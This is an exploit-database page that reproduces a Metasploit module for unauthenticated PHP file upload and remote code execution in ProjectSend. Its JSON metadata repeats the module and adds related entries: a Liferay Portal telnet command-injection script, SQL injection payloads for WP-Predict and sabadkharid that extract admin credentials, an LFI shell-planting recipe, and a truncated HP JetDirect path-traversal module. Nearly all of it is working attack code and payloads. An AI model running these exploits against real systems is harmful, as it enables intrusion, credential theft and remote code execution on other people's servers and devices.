ID 1337DAY-ID-23041 Type zdt Reporter metasploit Modified 2014-12-30T00:00:00
Description
This Metasploit module exploits a file upload vulnerability in ProjectSend revisions 100 to 561. The 'process-upload.php' file allows unauthenticated users to upload PHP files resulting in remote code execution as the web server user.
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::FileDropper
def initialize(info={})
super(update_info(info,
'Name' => 'ProjectSend Arbitrary File Upload',
'Description' => %q{
This module exploits a file upload vulnerability in ProjectSend
revisions 100 to 561. The 'process-upload.php' file allows
unauthenticated users to upload PHP files resulting in remote
code execution as the web server user.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Fady Mohammed Osman', # Discovery and Exploit
'Brendan Coles <bcoles[at]gmail.com>' # Metasploit
],
'References' =>
[
['EDB', '35424']
],
'Payload' =>
{
'BadChars' => "\x00"
},
'Arch' => ARCH_PHP,
'Platform' => 'php',
'Targets' =>
[
# Tested on ProjectSend revisions 100, 157, 180, 250, 335, 405 and 561 on Apache (Ubuntu)
['ProjectSend (PHP Payload)', {}]
],
'Privileged' => false,
'DisclosureDate' => 'Dec 02 2014',
'DefaultTarget' => 0))
register_options(
[
OptString.new('TARGETURI', [true, 'The base path to ProjectSend', '/ProjectSend/'])
], self.class)
end
#
# Checks if target upload functionality is working
#
def check
res = send_request_cgi(
'uri' => normalize_uri(target_uri.path, 'process-upload.php')
)
if !res
vprint_error("#{peer} - Connection timed out")
return Exploit::CheckCode::Unknown
elsif res.code.to_i == 404
vprint_error("#{peer} - No process-upload.php found")
return Exploit::CheckCode::Safe
elsif res.code.to_i == 500
vprint_error("#{peer} - Unable to write file")
return Exploit::CheckCode::Safe
elsif res.code.to_i == 200 && res.body && res.body =~ /<\?php/
vprint_error("#{peer} - File process-upload.php is not executable")
return Exploit::CheckCode::Safe
elsif res.code.to_i == 200 && res.body && res.body =~ /sys\.config\.php/
vprint_error("#{peer} - Software is misconfigured")
return Exploit::CheckCode::Safe
elsif res.code.to_i == 200 && res.body && res.body =~ /jsonrpc/
# response on revision 118 onwards includes the file name
if res.body && res.body =~ /NewFileName/
return Exploit::CheckCode::Vulnerable
# response on revisions 100 to 117 does not include the file name
elsif res.body && res.body =~ /{"jsonrpc" : "2.0", "result" : null, "id" : "id"}/
return Exploit::CheckCode::Appears
elsif res.body && res.body =~ /Failed to open output stream/
vprint_error("#{peer} - Upload folder is not writable")
return Exploit::CheckCode::Safe
else
return Exploit::CheckCode::Detected
end
else
return Exploit::CheckCode::Safe
end
end
#
# Upload PHP payload
#
def upload
fname = "#{rand_text_alphanumeric(rand(10) + 6)}.php"
php = "<?php #{payload.encoded} ?>"
data = Rex::MIME::Message.new
data.add_part(php, 'application/octet-stream', nil, %(form-data; name="file"; filename="#{fname}"))
post_data = data.to_s
print_status("#{peer} - Uploading file '#{fname}' (#{php.length} bytes)")
res = send_request_cgi(
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, "process-upload.php?name=#{fname}"),
'ctype' => "multipart/form-data; boundary=#{data.bound}",
'data' => post_data
)
if !res
fail_with(Failure::Unknown, "#{peer} - Request timed out while uploading")
elsif res.code.to_i == 404
fail_with(Failure::NotFound, "#{peer} - No process-upload.php found")
elsif res.code.to_i == 500
fail_with(Failure::Unknown, "#{peer} - Unable to write #{fname}")
elsif res.code.to_i == 200 && res.body && res.body =~ /Failed to open output stream/
fail_with(Failure::NotVulnerable, "#{peer} - Upload folder is not writable")
elsif res.code.to_i == 200 && res.body && res.body =~ /<\?php/
fail_with(Failure::NotVulnerable, "#{peer} - File process-upload.php is not executable")
elsif res.code.to_i == 200 && res.body && res.body =~ /sys.config.php/
fail_with(Failure::NotVulnerable, "#{peer} - Software is misconfigured")
# response on revision 118 onwards includes the file name
elsif res.code.to_i == 200 && res.body && res.body =~ /NewFileName/
print_good("#{peer} - Payload uploaded successfully (#{fname})")
return fname
# response on revisions 100 to 117 does not include the file name
elsif res.code.to_i == 200 && res.body =~ /{"jsonrpc" : "2.0", "result" : null, "id" : "id"}/
print_warning("#{peer} - File upload may have failed")
return fname
else
vprint_debug("#{peer} - Received response: #{res.code} - #{res.body}")
fail_with(Failure::Unknown, "#{peer} - Something went wrong")
end
end
#
# Execute uploaded file
#
def exec(upload_path)
print_status("#{peer} - Executing #{upload_path}...")
res = send_request_raw(
{ 'uri' => normalize_uri(target_uri.path, upload_path) }, 5
)
if !res
print_status("#{peer} - Request timed out while executing")
elsif res.code.to_i == 404
vprint_error("#{peer} - Not found: #{upload_path}")
elsif res.code.to_i == 200
vprint_good("#{peer} - Executed #{upload_path}")
else
print_error("#{peer} - Unexpected reply")
end
end
#
# upload && execute
#
def exploit
fname = upload
register_files_for_cleanup(fname)
exec("upload/files/#{fname}") # default for r-221 onwards
unless session_created?
exec("upload/temp/#{fname}") # default for r-100 to r-219
end
end
end
# 0day.today [2018-01-06] #
{"hash": "b45fbd00bc811684a8ceee99c726a0c35d9504338363c56b8b774404d66e097a", "id": "1337DAY-ID-23041", "lastseen": "2018-01-06T07:00:21", "viewCount": 11, "hashmap": [{"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "0ae13ecce5197c76eba23ab354cfb4fc", "key": "description"}, {"hash": "1be4985a17c84e1f1e6be789bfeeb96f", "key": "href"}, {"hash": "bbee971a2616610d08cb871905cc4b31", "key": "modified"}, {"hash": "bbee971a2616610d08cb871905cc4b31", "key": "published"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "6719951e37a5b7c4b959f8df50c9d641", "key": "reporter"}, {"hash": "9399f4c8f752b2882d1fc7d453c04008", "key": "sourceData"}, {"hash": "6e882c46fd45e6e50e548c3217287077", "key": "sourceHref"}, {"hash": "e4dadfa7631398e731956ec8d5ae36f2", "key": "title"}, {"hash": "0678144464852bba10aa2eddf3783f0a", "key": "type"}], "bulletinFamily": "exploit", "cvss": {"score": 0.0, "vector": "NONE"}, "edition": 2, "enchantments": {"score": {"value": 7.5, "vector": "NONE"}, "dependencies": {"references": [{"type": "zdt", "idList": ["1337DAY-ID-23043", "1337DAY-ID-16622", "1337DAY-ID-16623"]}, {"type": "seebug", "idList": ["SSV:67248"]}, {"type": "nessus", "idList": ["REDHAT-RHSA-2010-0060.NASL", "REDHAT-RHSA-2010-0038.NASL", "REDHAT-RHSA-2010-0037.NASL", "SUSE_ACROREAD_JA-6804.NASL", "SUSE_ACROREAD_JA-6805.NASL", "SUSE_ACROREAD-6803.NASL", "SUSE_ACROREAD-6802.NASL", "SUSE_11_ACROREAD_JA-100128.NASL", "SUSE_11_0_ACROREAD-100122.NASL", "SUSE_11_1_ACROREAD-100122.NASL"]}, {"type": "exploitdb", "idList": ["EDB-ID:16623", "EDB-ID:16503"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:10516"]}], "modified": "2018-01-06T07:00:21"}, "vulnersScore": 7.5}, "type": "zdt", "sourceHref": "https://0day.today/exploit/23041", "description": "This Metasploit module exploits a file upload vulnerability in ProjectSend revisions 100 to 561. The 'process-upload.php' file allows unauthenticated users to upload PHP files resulting in remote code execution as the web server user.", "title": "ProjectSend Arbitrary File Upload Exploit", "history": [{"bulletin": {"hash": "461131f39537a6010b5e10d2edc8c2c40867e3a6dd6915e97f933b7b079c5757", "id": "1337DAY-ID-23041", "lastseen": "2016-04-20T02:13:19", "enchantments": {"score": {"value": 9.0, "modified": "2016-04-20T02:13:19"}}, "hashmap": [{"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "6719951e37a5b7c4b959f8df50c9d641", "key": "reporter"}, {"hash": "bbee971a2616610d08cb871905cc4b31", "key": "modified"}, {"hash": "0678144464852bba10aa2eddf3783f0a", "key": "type"}, {"hash": "bbee971a2616610d08cb871905cc4b31", "key": "published"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "b889bd0cfbd114f81bae34f1b4b53b0d", "key": "sourceData"}, {"hash": "c318f49173c357c51baf9365199ac4b1", "key": "sourceHref"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "0ae13ecce5197c76eba23ab354cfb4fc", "key": "description"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "d49ed7013c17e5e554f40e5a7735c0a3", "key": "href"}, {"hash": "e4dadfa7631398e731956ec8d5ae36f2", "key": "title"}], "bulletinFamily": "exploit", "history": [], "edition": 1, "type": "zdt", "sourceHref": "http://0day.today/exploit/23041", "description": "This Metasploit module exploits a file upload vulnerability in ProjectSend revisions 100 to 561. The 'process-upload.php' file allows unauthenticated users to upload PHP files resulting in remote code execution as the web server user.", "viewCount": 3, "title": "ProjectSend Arbitrary File Upload Exploit", "cvss": {"score": 0.0, "vector": "NONE"}, "objectVersion": "1.0", "cvelist": [], "sourceData": "##\r\n# This module requires Metasploit: http://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n Rank = ExcellentRanking\r\n\r\n include Msf::Exploit::Remote::HttpClient\r\n include Msf::Exploit::FileDropper\r\n\r\n def initialize(info={})\r\n super(update_info(info,\r\n 'Name' => 'ProjectSend Arbitrary File Upload',\r\n 'Description' => %q{\r\n This module exploits a file upload vulnerability in ProjectSend\r\n revisions 100 to 561. The 'process-upload.php' file allows\r\n unauthenticated users to upload PHP files resulting in remote\r\n code execution as the web server user.\r\n },\r\n 'License' => MSF_LICENSE,\r\n 'Author' =>\r\n [\r\n 'Fady Mohammed Osman', # Discovery and Exploit\r\n 'Brendan Coles <bcoles[at]gmail.com>' # Metasploit\r\n ],\r\n 'References' =>\r\n [\r\n ['EDB', '35424']\r\n ],\r\n 'Payload' =>\r\n {\r\n 'BadChars' => \"\\x00\"\r\n },\r\n 'Arch' => ARCH_PHP,\r\n 'Platform' => 'php',\r\n 'Targets' =>\r\n [\r\n # Tested on ProjectSend revisions 100, 157, 180, 250, 335, 405 and 561 on Apache (Ubuntu)\r\n ['ProjectSend (PHP Payload)', {}]\r\n ],\r\n 'Privileged' => false,\r\n 'DisclosureDate' => 'Dec 02 2014',\r\n 'DefaultTarget' => 0))\r\n\r\n register_options(\r\n [\r\n OptString.new('TARGETURI', [true, 'The base path to ProjectSend', '/ProjectSend/'])\r\n ], self.class)\r\n end\r\n\r\n #\r\n # Checks if target upload functionality is working\r\n #\r\n def check\r\n res = send_request_cgi(\r\n 'uri' => normalize_uri(target_uri.path, 'process-upload.php')\r\n )\r\n if !res\r\n vprint_error(\"#{peer} - Connection timed out\")\r\n return Exploit::CheckCode::Unknown\r\n elsif res.code.to_i == 404\r\n vprint_error(\"#{peer} - No process-upload.php found\")\r\n return Exploit::CheckCode::Safe\r\n elsif res.code.to_i == 500\r\n vprint_error(\"#{peer} - Unable to write file\")\r\n return Exploit::CheckCode::Safe\r\n elsif res.code.to_i == 200 && res.body && res.body =~ /<\\?php/\r\n vprint_error(\"#{peer} - File process-upload.php is not executable\")\r\n return Exploit::CheckCode::Safe\r\n elsif res.code.to_i == 200 && res.body && res.body =~ /sys\\.config\\.php/\r\n vprint_error(\"#{peer} - Software is misconfigured\")\r\n return Exploit::CheckCode::Safe\r\n elsif res.code.to_i == 200 && res.body && res.body =~ /jsonrpc/\r\n # response on revision 118 onwards includes the file name\r\n if res.body && res.body =~ /NewFileName/\r\n return Exploit::CheckCode::Vulnerable\r\n # response on revisions 100 to 117 does not include the file name\r\n elsif res.body && res.body =~ /{\"jsonrpc\" : \"2.0\", \"result\" : null, \"id\" : \"id\"}/\r\n return Exploit::CheckCode::Appears\r\n elsif res.body && res.body =~ /Failed to open output stream/\r\n vprint_error(\"#{peer} - Upload folder is not writable\")\r\n return Exploit::CheckCode::Safe\r\n else\r\n return Exploit::CheckCode::Detected\r\n end\r\n else\r\n return Exploit::CheckCode::Safe\r\n end\r\n end\r\n\r\n #\r\n # Upload PHP payload\r\n #\r\n def upload\r\n fname = \"#{rand_text_alphanumeric(rand(10) + 6)}.php\"\r\n php = \"<?php #{payload.encoded} ?>\"\r\n data = Rex::MIME::Message.new\r\n data.add_part(php, 'application/octet-stream', nil, %(form-data; name=\"file\"; filename=\"#{fname}\"))\r\n post_data = data.to_s\r\n print_status(\"#{peer} - Uploading file '#{fname}' (#{php.length} bytes)\")\r\n res = send_request_cgi(\r\n 'method' => 'POST',\r\n 'uri' => normalize_uri(target_uri.path, \"process-upload.php?name=#{fname}\"),\r\n 'ctype' => \"multipart/form-data; boundary=#{data.bound}\",\r\n 'data' => post_data\r\n )\r\n if !res\r\n fail_with(Failure::Unknown, \"#{peer} - Request timed out while uploading\")\r\n elsif res.code.to_i == 404\r\n fail_with(Failure::NotFound, \"#{peer} - No process-upload.php found\")\r\n elsif res.code.to_i == 500\r\n fail_with(Failure::Unknown, \"#{peer} - Unable to write #{fname}\")\r\n elsif res.code.to_i == 200 && res.body && res.body =~ /Failed to open output stream/\r\n fail_with(Failure::NotVulnerable, \"#{peer} - Upload folder is not writable\")\r\n elsif res.code.to_i == 200 && res.body && res.body =~ /<\\?php/\r\n fail_with(Failure::NotVulnerable, \"#{peer} - File process-upload.php is not executable\")\r\n elsif res.code.to_i == 200 && res.body && res.body =~ /sys.config.php/\r\n fail_with(Failure::NotVulnerable, \"#{peer} - Software is misconfigured\")\r\n # response on revision 118 onwards includes the file name\r\n elsif res.code.to_i == 200 && res.body && res.body =~ /NewFileName/\r\n print_good(\"#{peer} - Payload uploaded successfully (#{fname})\")\r\n return fname\r\n # response on revisions 100 to 117 does not include the file name\r\n elsif res.code.to_i == 200 && res.body =~ /{\"jsonrpc\" : \"2.0\", \"result\" : null, \"id\" : \"id\"}/\r\n print_warning(\"#{peer} - File upload may have failed\")\r\n return fname\r\n else\r\n vprint_debug(\"#{peer} - Received response: #{res.code} - #{res.body}\")\r\n fail_with(Failure::Unknown, \"#{peer} - Something went wrong\")\r\n end\r\n end\r\n\r\n #\r\n # Execute uploaded file\r\n #\r\n def exec(upload_path)\r\n print_status(\"#{peer} - Executing #{upload_path}...\")\r\n res = send_request_raw(\r\n { 'uri' => normalize_uri(target_uri.path, upload_path) }, 5\r\n )\r\n if !res\r\n print_status(\"#{peer} - Request timed out while executing\")\r\n elsif res.code.to_i == 404\r\n vprint_error(\"#{peer} - Not found: #{upload_path}\")\r\n elsif res.code.to_i == 200\r\n vprint_good(\"#{peer} - Executed #{upload_path}\")\r\n else\r\n print_error(\"#{peer} - Unexpected reply\")\r\n end\r\n end\r\n\r\n #\r\n # upload && execute\r\n #\r\n def exploit\r\n fname = upload\r\n register_files_for_cleanup(fname)\r\n exec(\"upload/files/#{fname}\") # default for r-221 onwards\r\n unless session_created?\r\n exec(\"upload/temp/#{fname}\") # default for r-100 to r-219\r\n end\r\n end\r\nend\n\n# 0day.today [2016-04-20] #", "published": "2014-12-30T00:00:00", "references": [], "reporter": "metasploit", "modified": "2014-12-30T00:00:00", "href": "http://0day.today/exploit/description/23041"}, "lastseen": "2016-04-20T02:13:19", "edition": 1, "differentElements": ["sourceHref", "sourceData", "href"]}], "objectVersion": "1.3", "cvelist": [], "sourceData": "##\r\n# This module requires Metasploit: http://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n Rank = ExcellentRanking\r\n\r\n include Msf::Exploit::Remote::HttpClient\r\n include Msf::Exploit::FileDropper\r\n\r\n def initialize(info={})\r\n super(update_info(info,\r\n 'Name' => 'ProjectSend Arbitrary File Upload',\r\n 'Description' => %q{\r\n This module exploits a file upload vulnerability in ProjectSend\r\n revisions 100 to 561. The 'process-upload.php' file allows\r\n unauthenticated users to upload PHP files resulting in remote\r\n code execution as the web server user.\r\n },\r\n 'License' => MSF_LICENSE,\r\n 'Author' =>\r\n [\r\n 'Fady Mohammed Osman', # Discovery and Exploit\r\n 'Brendan Coles <bcoles[at]gmail.com>' # Metasploit\r\n ],\r\n 'References' =>\r\n [\r\n ['EDB', '35424']\r\n ],\r\n 'Payload' =>\r\n {\r\n 'BadChars' => \"\\x00\"\r\n },\r\n 'Arch' => ARCH_PHP,\r\n 'Platform' => 'php',\r\n 'Targets' =>\r\n [\r\n # Tested on ProjectSend revisions 100, 157, 180, 250, 335, 405 and 561 on Apache (Ubuntu)\r\n ['ProjectSend (PHP Payload)', {}]\r\n ],\r\n 'Privileged' => false,\r\n 'DisclosureDate' => 'Dec 02 2014',\r\n 'DefaultTarget' => 0))\r\n\r\n register_options(\r\n [\r\n OptString.new('TARGETURI', [true, 'The base path to ProjectSend', '/ProjectSend/'])\r\n ], self.class)\r\n end\r\n\r\n #\r\n # Checks if target upload functionality is working\r\n #\r\n def check\r\n res = send_request_cgi(\r\n 'uri' => normalize_uri(target_uri.path, 'process-upload.php')\r\n )\r\n if !res\r\n vprint_error(\"#{peer} - Connection timed out\")\r\n return Exploit::CheckCode::Unknown\r\n elsif res.code.to_i == 404\r\n vprint_error(\"#{peer} - No process-upload.php found\")\r\n return Exploit::CheckCode::Safe\r\n elsif res.code.to_i == 500\r\n vprint_error(\"#{peer} - Unable to write file\")\r\n return Exploit::CheckCode::Safe\r\n elsif res.code.to_i == 200 && res.body && res.body =~ /<\\?php/\r\n vprint_error(\"#{peer} - File process-upload.php is not executable\")\r\n return Exploit::CheckCode::Safe\r\n elsif res.code.to_i == 200 && res.body && res.body =~ /sys\\.config\\.php/\r\n vprint_error(\"#{peer} - Software is misconfigured\")\r\n return Exploit::CheckCode::Safe\r\n elsif res.code.to_i == 200 && res.body && res.body =~ /jsonrpc/\r\n # response on revision 118 onwards includes the file name\r\n if res.body && res.body =~ /NewFileName/\r\n return Exploit::CheckCode::Vulnerable\r\n # response on revisions 100 to 117 does not include the file name\r\n elsif res.body && res.body =~ /{\"jsonrpc\" : \"2.0\", \"result\" : null, \"id\" : \"id\"}/\r\n return Exploit::CheckCode::Appears\r\n elsif res.body && res.body =~ /Failed to open output stream/\r\n vprint_error(\"#{peer} - Upload folder is not writable\")\r\n return Exploit::CheckCode::Safe\r\n else\r\n return Exploit::CheckCode::Detected\r\n end\r\n else\r\n return Exploit::CheckCode::Safe\r\n end\r\n end\r\n\r\n #\r\n # Upload PHP payload\r\n #\r\n def upload\r\n fname = \"#{rand_text_alphanumeric(rand(10) + 6)}.php\"\r\n php = \"<?php #{payload.encoded} ?>\"\r\n data = Rex::MIME::Message.new\r\n data.add_part(php, 'application/octet-stream', nil, %(form-data; name=\"file\"; filename=\"#{fname}\"))\r\n post_data = data.to_s\r\n print_status(\"#{peer} - Uploading file '#{fname}' (#{php.length} bytes)\")\r\n res = send_request_cgi(\r\n 'method' => 'POST',\r\n 'uri' => normalize_uri(target_uri.path, \"process-upload.php?name=#{fname}\"),\r\n 'ctype' => \"multipart/form-data; boundary=#{data.bound}\",\r\n 'data' => post_data\r\n )\r\n if !res\r\n fail_with(Failure::Unknown, \"#{peer} - Request timed out while uploading\")\r\n elsif res.code.to_i == 404\r\n fail_with(Failure::NotFound, \"#{peer} - No process-upload.php found\")\r\n elsif res.code.to_i == 500\r\n fail_with(Failure::Unknown, \"#{peer} - Unable to write #{fname}\")\r\n elsif res.code.to_i == 200 && res.body && res.body =~ /Failed to open output stream/\r\n fail_with(Failure::NotVulnerable, \"#{peer} - Upload folder is not writable\")\r\n elsif res.code.to_i == 200 && res.body && res.body =~ /<\\?php/\r\n fail_with(Failure::NotVulnerable, \"#{peer} - File process-upload.php is not executable\")\r\n elsif res.code.to_i == 200 && res.body && res.body =~ /sys.config.php/\r\n fail_with(Failure::NotVulnerable, \"#{peer} - Software is misconfigured\")\r\n # response on revision 118 onwards includes the file name\r\n elsif res.code.to_i == 200 && res.body && res.body =~ /NewFileName/\r\n print_good(\"#{peer} - Payload uploaded successfully (#{fname})\")\r\n return fname\r\n # response on revisions 100 to 117 does not include the file name\r\n elsif res.code.to_i == 200 && res.body =~ /{\"jsonrpc\" : \"2.0\", \"result\" : null, \"id\" : \"id\"}/\r\n print_warning(\"#{peer} - File upload may have failed\")\r\n return fname\r\n else\r\n vprint_debug(\"#{peer} - Received response: #{res.code} - #{res.body}\")\r\n fail_with(Failure::Unknown, \"#{peer} - Something went wrong\")\r\n end\r\n end\r\n\r\n #\r\n # Execute uploaded file\r\n #\r\n def exec(upload_path)\r\n print_status(\"#{peer} - Executing #{upload_path}...\")\r\n res = send_request_raw(\r\n { 'uri' => normalize_uri(target_uri.path, upload_path) }, 5\r\n )\r\n if !res\r\n print_status(\"#{peer} - Request timed out while executing\")\r\n elsif res.code.to_i == 404\r\n vprint_error(\"#{peer} - Not found: #{upload_path}\")\r\n elsif res.code.to_i == 200\r\n vprint_good(\"#{peer} - Executed #{upload_path}\")\r\n else\r\n print_error(\"#{peer} - Unexpected reply\")\r\n end\r\n end\r\n\r\n #\r\n # upload && execute\r\n #\r\n def exploit\r\n fname = upload\r\n register_files_for_cleanup(fname)\r\n exec(\"upload/files/#{fname}\") # default for r-221 onwards\r\n unless session_created?\r\n exec(\"upload/temp/#{fname}\") # default for r-100 to r-219\r\n end\r\n end\r\nend\n\n# 0day.today [2018-01-06] #", "published": "2014-12-30T00:00:00", "references": [], "reporter": "metasploit", "modified": "2014-12-30T00:00:00", "href": "https://0day.today/exploit/description/23041"}
{"zdt": [{"lastseen": "2018-03-09T16:07:50", "bulletinFamily": "exploit", "description": "Exploit for windows platform in category remote exploits", "modified": "2014-12-30T00:00:00", "published": "2014-12-30T00:00:00", "id": "1337DAY-ID-23043", "href": "https://0day.today/exploit/description/23043", "type": "zdt", "title": "Liferay Portal 7.0.x <= 7.0.2 - Pre-Auth RCE Exploit", "sourceData": "#!/bin/sh\r\n \r\n# Exploit title: Liferay Portal 7.0 RCE\r\n# Date: 11/16/2014\r\n# Exploit author: drone (@dronesec)\r\n# Vendor homepage: http://www.liferay.com/\r\n# Software link: http://downloads.sourceforge.net/project/lportal/Liferay%20Portal/7.0.0%20M2/liferay-portal-tomcat-7.0-ce-m2-20141017162509960.zip\r\n# Version: 7.0.0/7.0.1/7.0.2\r\n# Fixed in: 7.0.3\r\n# Tested on: Windows 7\r\n \r\n# Pre-auth command injection using an exposed Apache Felix,\r\n# exposed by default on all Liferay Portal 7.0 installs.\r\n#\r\n# ./liferay_portal7.sh 192.168.1.1 \"cmd.exe /C calc.exe\"\r\n#\r\n \r\n \r\n(echo open $1 11311\r\nsleep 1\r\necho system:getproperties\r\nsleep 1\r\necho exec \\\"$2\\\"\r\nsleep 1\r\n) | telnet\n\n# 0day.today [2018-03-09] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/23043"}, {"lastseen": "2018-04-12T03:52:27", "bulletinFamily": "exploit", "description": "Exploit for php platform in category web applications", "modified": "2012-07-10T00:00:00", "published": "2012-07-10T00:00:00", "id": "1337DAY-ID-18946", "href": "https://0day.today/exploit/description/18946", "type": "zdt", "title": "Wordpress Plugins - WP-Predict v1.0 Blind SQL Injection", "sourceData": "# Exploit Title: WordPress WP-Predict v1.0 Blind SQL Injection\r\n# Date: 7/9/12\r\n# Exploit Author: Chris Kellum\r\n# Vendor Homepage: http://www.pootlepress.co.uk/\r\n# Software Link: http://downloads.wordpress.org/plugin/wp-predict.zip\r\n# Version: 1.0\r\n \r\n \r\n \r\n=====================\r\nVulnerability Details\r\n=====================\r\n \r\nPredictId parameter in post request is vulnerable to blind SQL injection.\r\n \r\n===============\r\nTesting Details\r\n===============\r\n \r\nWhen attempting follow-up submissions, the plugin states that you've already voted. This can easily be circumvented by using your browser's back button.\r\n \r\n=================\r\nInjection Example\r\n=================\r\n \r\nUsing Burp Suite or other proxy, intercept the post request when submitting your answer and append and 1=1 to the predictId parameter before forwarding:\r\n \r\npredictSelection=1&predictId=1 and 1=1&postAction=submitVote&submitVote.x=70&submitVote.y=26\r\n \r\nIn the example above, the statement evaluates to true and the vote count increases by 1.\r\n \r\nSending a new request with \"predictId=1 and 1=0\" will not increase the vote count.\r\n\r\n\n\n# 0day.today [2018-04-12] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/18946"}, {"lastseen": "2018-01-06T01:04:34", "bulletinFamily": "exploit", "description": "Exploit for php platform in category web applications", "modified": "2011-08-07T00:00:00", "published": "2011-08-07T00:00:00", "id": "1337DAY-ID-16622", "href": "https://0day.today/exploit/description/16622", "type": "zdt", "title": "Cart Software Multiple Vulnerabilities", "sourceData": "# Exploit Title: sabadkharid CMS Multiple Vulnerabilities\r\n# Date: 8/07/2011\r\n# Author: hosinn\r\n# Software Link: http://www.sabadkharid.com\r\n# Version: professional edition\r\n# Platform / Tested on: Multiple\r\n# Category: webapplications\r\n# Code : N/A\r\n# Download Video: http://hosinn.persiangig.com/video/sabadkharid.rar\r\n# BUG Sql Injectin : ###############################################################\r\n \r\n1 > cart.php have sql injection bug .\r\n \r\n2 > go to http://target.com/cart.php?shopping_cart&add2cart=10'\r\n \r\n \r\n# Expolite : #######################################################################\r\n \r\n1 > get version => http://site.com/cart.php?shopping_cart&add2cart=10 /*!and(select 1 from(select count(*),concat((select (select @@version) from `information_schema`.tables limit 0,1),floor(rand(0)*2))x from `information_schema`.tables group by x)a) and 1=1*/\r\n \r\n2 > get username => http://site.com/cart.php?shopping_cart&add2cart=10 /*!and(select 1 from(select count(*),concat((select (select login) from SKH_customers limit 0,1),floor(rand(0)*2))x from `information_schema`.tables group by x)a) and 1=1*/\r\n \r\n > output like 'admin1' and username:admin\r\n \r\n3 > get password => http://site.com/cart.php?shopping_cart&add2cart=10 /*!and(select 1 from(select count(*),concat((select (select cust_password) from SKH_customers limit 0,1),floor(rand(0)*2))x from `information_schema`.tables group by x)a) and 1=1*/\r\n \r\n > output like 'pass1' and username:pass\r\n \r\n4 > Then Login To Site\r\n \r\n# BUG LFI : ######################################################################\r\n \r\n1 > Go To Http://site.com/admin.php\r\n \r\n2 > Go To Http://site.com/admin.php?tab=conf\u00e2\u0160\u201a=template&edit=../../../cart.php\r\n \r\n3 > Then Copy Your Shell script & Save\r\n \r\n4 > Find Your Shell in Http://site.com/cart.php\r\n \r\n \r\n#############################################################################\r\nOur Website : http://www.nopotm.ir\r\nSpecial Thanks to : H-SK33PY , Immortal Boy , BigB4NG , N3td3v!l ,\r\nBlacksun , Drosera^Cqq47 , NOPO , zilli0o0n & all iranian NOPO members\r\n#############################################################################\r\n\r\n\n\n# 0day.today [2018-01-05] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/16622"}, {"lastseen": "2018-03-02T23:43:49", "bulletinFamily": "exploit", "description": "Exploit for hardware platform in category remote exploits", "modified": "2011-08-07T00:00:00", "published": "2011-08-07T00:00:00", "id": "1337DAY-ID-16623", "href": "https://0day.today/exploit/description/16623", "type": "zdt", "title": "HP JetDirect PJL Interface Universal Path Traversal", "sourceData": "# Exploit Title: HP JetDirect PJL Interface Universal Path Traversal\r\n# Date: Aug 7, 2011\r\n# Author: Myo Soe <YGN Ethical Hacker Group - http://yehg.net/>\r\n# Software Link: http://www.hp.com\r\n# Version: All\r\n# Tested on: HP LaserJet Pxxxx Series\r\n \r\n##\r\n# $Id: $\r\n##\r\n \r\n##\r\n# This file is part of the Metasploit Framework and may be subject to\r\n# redistribution and commercial restrictions. Please see the Metasploit\r\n# Framework web site for more information on licensing and terms of use.\r\n# http://metasploit.com/framework/\r\n##\r\n \r\n \r\n##\r\n# Sample Output:\r\n#\r\n#\r\n# msf auxiliary(hp_printer_pjl_traversal) > show options\r\n#\r\n# Module options (auxiliary/admin/hp_printer_pjl_traversal):\r\n#\r\n# Name Current Setting Required Description\r\n# ---- --------------- -------- -----------\r\n# INTERACTIVE false no Enter interactive mode [msfconsole Only]\r\n# RHOST 202.138.16.21 yes The target address\r\n# RPATH / yes The remote filesystem path to browse or read\r\n# RPORT 9100 yes The target port\r\n#\r\n#\r\n# msf auxiliary(hp_printer_pjl_traversal) > run\r\n#\r\n# [*] cd / ...\r\n# [+] Server returned the following response:\r\n#\r\n# . TYPE=DIR\r\n# .. TYPE=DIR\r\n# bin TYPE=DIR\r\n# usr TYPE=DIR\r\n# etc TYPE=DIR\r\n# hpmnt TYPE=DIR\r\n# hp TYPE=DIR\r\n# lib TYPE=DIR\r\n# dev TYPE=DIR\r\n# init TYPE=FILE SIZE=9016\r\n# .profile TYPE=FILE SIZE=834\r\n# tmp TYPE=DIR\r\n#\r\n#\r\n# msf auxiliary(hp_printer_pjl_traversal) > set INTERACTIVE true\r\n# INTERACTIVE => true\r\n# msf auxiliary(hp_printer_pjl_traversal) > set RPATH /hp\r\n# RPATH => /hp\r\n# msf auxiliary(hp_printer_pjl_traversal) > run\r\n#\r\n# [*] Entering interactive mode ...\r\n# [*] cd /hp ...\r\n# [+] Server returned the following response:\r\n#\r\n# . TYPE=DIR\r\n# .. TYPE=DIR\r\n# app TYPE=DIR\r\n# lib TYPE=DIR\r\n# bin TYPE=DIR\r\n# webServer TYPE=DIR\r\n# images TYPE=DIR\r\n# DemoPage TYPE=DIR\r\n# loc TYPE=DIR\r\n# AsianFonts TYPE=DIR\r\n# data TYPE=DIR\r\n# etc TYPE=DIR\r\n# lrt TYPE=DIR\r\n#\r\n# [*] Current RPATH: /hp\r\n# [*] -> 'quit' to 